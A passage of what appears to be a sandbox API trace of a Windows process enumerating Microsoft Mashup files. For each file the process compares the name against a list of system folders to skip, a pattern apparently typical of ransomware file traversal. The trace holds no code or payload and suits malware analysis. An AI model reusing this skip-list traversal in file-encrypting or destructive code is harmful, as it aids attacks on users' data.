lpWideCharStr="Microsoft.Mashup.Client.Models.dll", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0123.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Models.dll", cchWideChar=34, lpMultiByteStr=0x22d0d8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Models.dll", lpUsedDefaultChar=0x0) returned 34 [0123.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0123.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Models.dll", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0123.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Models.dll", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Models.dll", lpUsedDefaultChar=0x0) returned 34 [0123.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0123.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244840 | out: hHeap=0x1e0000) returned 1 [0123.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.242] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfcfa9f2d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcfa9f2d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffd42fe2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x23a5040, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Mashup.Client.Windows.dll", cAlternateFileName="MI7BEA~1.DLL")) returned 1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.dll", lpString2=".") returned 1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.dll", lpString2="..") returned 1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.dll", lpString2="...") returned 1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.dll", lpString2="windows") returned -1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.dll", lpString2="recovery") returned -1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.dll", lpString2="perflogs") returned -1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.dll", lpString2="documents and settings") returned 1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.dll", lpString2="system volume information") returned -1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.dll", lpString2="msocache") returned -1 [0123.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0123.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0123.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.dll", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.dll", lpUsedDefaultChar=0x0) returned 35 [0123.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0123.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0123.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0123.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.dll", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.dll", lpUsedDefaultChar=0x0) returned 35 [0123.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0123.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f280 [0123.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0123.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.243] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa8619f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa8619f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb91216, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x48d0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Mashup.Container.exe", cAlternateFileName="MICROS~2.EXE")) returned 1 [0123.243] lstrcmpiW (lpString1="Microsoft.Mashup.Container.exe", lpString2=".") returned 1 [0123.243] lstrcmpiW (lpString1="Microsoft.Mashup.Container.exe", lpString2="..") returned 1 [0123.243] lstrcmpiW (lpString1="Microsoft.Mashup.Container.exe", lpString2="...") returned 1 [0123.243] lstrcmpiW (lpString1="Microsoft.Mashup.Container.exe", lpString2="windows") returned -1 [0123.243] lstrcmpiW (lpString1="Microsoft.Mashup.Container.exe", lpString2="recovery") returned -1 [0123.243] lstrcmpiW (lpString1="Microsoft.Mashup.Container.exe", lpString2="perflogs") returned -1 [0123.243] lstrcmpiW (lpString1="Microsoft.Mashup.Container.exe", lpString2="documents and settings") returned 1 [0123.243] lstrcmpiW (lpString1="Microsoft.Mashup.Container.exe", lpString2="$RECYCLE.BIN") returned 1 [0123.243] lstrcmpiW (lpString1="Microsoft.Mashup.Container.exe", lpString2="system volume information") returned -1 [0123.243] lstrcmpiW (lpString1="Microsoft.Mashup.Container.exe", lpString2="msocache") returned -1 [0123.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0123.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Container.exe", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0123.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0123.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Container.exe", cchWideChar=30, lpMultiByteStr=0x2412e0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Container.exe", lpUsedDefaultChar=0x0) returned 30 [0123.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0123.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0123.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Container.exe", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0123.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0123.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Container.exe", cchWideChar=30, lpMultiByteStr=0x241290, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Container.exe", lpUsedDefaultChar=0x0) returned 30 [0123.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0123.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e8b8 [0123.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0123.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0123.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0123.244] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x88e2fa3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x88e2fa3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x92201bc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5070, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Mashup.Container.NetFX40.exe", cAlternateFileName="MICROS~3.EXE")) returned 1 [0123.244] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX40.exe", lpString2=".") returned 1 [0123.244] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX40.exe", lpString2="..") returned 1 [0123.244] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX40.exe", lpString2="...") returned 1 [0123.244] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX40.exe", lpString2="windows") returned -1 [0123.244] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX40.exe", lpString2="recovery") returned -1 [0123.244] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX40.exe", lpString2="perflogs") returned -1 [0123.244] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX40.exe", lpString2="documents and settings") returned 1 [0123.244] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX40.exe", lpString2="$RECYCLE.BIN") returned 1 [0123.244] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX40.exe", lpString2="system volume information") returned -1 [0123.244] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX40.exe", lpString2="msocache") returned -1 [0123.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0123.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Container.NetFX40.exe", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0123.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Container.NetFX40.exe", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Container.NetFX40.exe", lpUsedDefaultChar=0x0) returned 38 [0123.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0123.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0123.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Container.NetFX40.exe", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0123.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Container.NetFX40.exe", cchWideChar=38, lpMultiByteStr=0x22d298, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Container.NetFX40.exe", lpUsedDefaultChar=0x0) returned 38 [0123.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0123.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0123.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0123.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.244] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6d76e38, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6d76e38, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6de953e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ad0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Mashup.Container.NetFX45.exe", cAlternateFileName="MICROS~1.EXE")) returned 1 [0123.244] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX45.exe", lpString2=".") returned 1 [0123.244] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX45.exe", lpString2="..") returned 1 [0123.244] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX45.exe", lpString2="...") returned 1 [0123.244] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX45.exe", lpString2="windows") returned -1 [0123.244] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX45.exe", lpString2="recovery") returned -1 [0123.244] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX45.exe", lpString2="perflogs") returned -1 [0123.245] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX45.exe", lpString2="documents and settings") returned 1 [0123.245] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX45.exe", lpString2="$RECYCLE.BIN") returned 1 [0123.245] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX45.exe", lpString2="system volume information") returned -1 [0123.245] lstrcmpiW (lpString1="Microsoft.Mashup.Container.NetFX45.exe", lpString2="msocache") returned -1 [0123.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0123.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Container.NetFX45.exe", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0123.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Container.NetFX45.exe", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Container.NetFX45.exe", lpUsedDefaultChar=0x0) returned 38 [0123.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0123.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Container.NetFX45.exe", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0123.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Container.NetFX45.exe", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Container.NetFX45.exe", lpUsedDefaultChar=0x0) returned 38 [0123.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f848 [0123.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0123.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.245] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7b9ee02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7b9ee02, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7b9ee02, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1e0ea8, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Mashup.Document.dll", cAlternateFileName="MI8E0B~1.DLL")) returned 1 [0123.245] lstrcmpiW (lpString1="Microsoft.Mashup.Document.dll", lpString2=".") returned 1 [0123.245] lstrcmpiW (lpString1="Microsoft.Mashup.Document.dll", lpString2="..") returned 1 [0123.245] lstrcmpiW (lpString1="Microsoft.Mashup.Document.dll", lpString2="...") returned 1 [0123.245] lstrcmpiW (lpString1="Microsoft.Mashup.Document.dll", lpString2="windows") returned -1 [0123.245] lstrcmpiW (lpString1="Microsoft.Mashup.Document.dll", lpString2="recovery") returned -1 [0123.245] lstrcmpiW (lpString1="Microsoft.Mashup.Document.dll", lpString2="perflogs") returned -1 [0123.245] lstrcmpiW (lpString1="Microsoft.Mashup.Document.dll", lpString2="documents and settings") returned 1 [0123.245] lstrcmpiW (lpString1="Microsoft.Mashup.Document.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.245] lstrcmpiW (lpString1="Microsoft.Mashup.Document.dll", lpString2="system volume information") returned -1 [0123.245] lstrcmpiW (lpString1="Microsoft.Mashup.Document.dll", lpString2="msocache") returned -1 [0123.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.dll", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.dll", lpUsedDefaultChar=0x0) returned 29 [0123.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.dll", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.dll", lpUsedDefaultChar=0x0) returned 29 [0123.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0123.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e228 [0123.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0123.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.246] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6bd443f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6bd443f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bd443f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc2040, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Mashup.Document.XmlSerializers.dll", cAlternateFileName="MI7AD6~1.DLL")) returned 1 [0123.246] lstrcmpiW (lpString1="Microsoft.Mashup.Document.XmlSerializers.dll", lpString2=".") returned 1 [0123.246] lstrcmpiW (lpString1="Microsoft.Mashup.Document.XmlSerializers.dll", lpString2="..") returned 1 [0123.246] lstrcmpiW (lpString1="Microsoft.Mashup.Document.XmlSerializers.dll", lpString2="...") returned 1 [0123.246] lstrcmpiW (lpString1="Microsoft.Mashup.Document.XmlSerializers.dll", lpString2="windows") returned -1 [0123.246] lstrcmpiW (lpString1="Microsoft.Mashup.Document.XmlSerializers.dll", lpString2="recovery") returned -1 [0123.246] lstrcmpiW (lpString1="Microsoft.Mashup.Document.XmlSerializers.dll", lpString2="perflogs") returned -1 [0123.246] lstrcmpiW (lpString1="Microsoft.Mashup.Document.XmlSerializers.dll", lpString2="documents and settings") returned 1 [0123.246] lstrcmpiW (lpString1="Microsoft.Mashup.Document.XmlSerializers.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.246] lstrcmpiW (lpString1="Microsoft.Mashup.Document.XmlSerializers.dll", lpString2="system volume information") returned -1 [0123.246] lstrcmpiW (lpString1="Microsoft.Mashup.Document.XmlSerializers.dll", lpString2="msocache") returned -1 [0123.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0123.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.XmlSerializers.dll", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0123.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.XmlSerializers.dll", cchWideChar=44, lpMultiByteStr=0x22cdc8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.XmlSerializers.dll", lpUsedDefaultChar=0x0) returned 44 [0123.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0123.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0123.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.XmlSerializers.dll", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0123.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.XmlSerializers.dll", cchWideChar=44, lpMultiByteStr=0x22ce70, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.XmlSerializers.dll", lpUsedDefaultChar=0x0) returned 44 [0123.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0123.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244708 [0123.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0123.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.246] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6b87f8e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b87f8e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bae279, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcaa8, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Mashup.OAuth.dll", cAlternateFileName="MIADE9~1.DLL")) returned 1 [0123.247] lstrcmpiW 